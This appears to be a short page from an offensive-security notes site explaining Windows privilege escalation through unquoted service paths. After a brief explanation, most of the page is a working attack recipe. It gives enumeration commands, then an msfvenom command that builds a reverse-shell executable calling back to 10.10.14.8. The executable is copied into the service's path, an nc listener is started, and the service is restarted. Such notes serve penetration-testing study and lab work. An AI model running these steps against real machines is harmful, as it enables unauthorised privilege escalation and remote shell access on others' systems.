Unquoted Service Paths

Overview

Unquotes service paths is similar to binary path exploitation, however the vulnerability lays in the fact that the path to the executable is unquoted.

When the service is started Windows looks through every word in the path separated with a space and test .exe

C:\Program.exe - NO
C:\Program Files.exe - NO
C:\Program Files\Unquoted.exe - NO
C:\Program Files\Unquoted Path.exe - NO

And so on...

Manual Exploitation

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

sc.exe qc iobitunsvr

Exploitation via PowerUp

Run PowerUp and search for Unquoted Service Paths section

Create and drop a malicious executable

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.8 LPORT=1337 -f exe -o Common.exe

copy C:\temp\Common.exe C:\Program Files\Unquoted Path Service\Common.exe

Start a listener and the service

nc -lnvp 1337

sc.exe start unquotedsvc

PreviousBinary Paths NextImpersonation and Potato Attacks

Last updated 8 months ago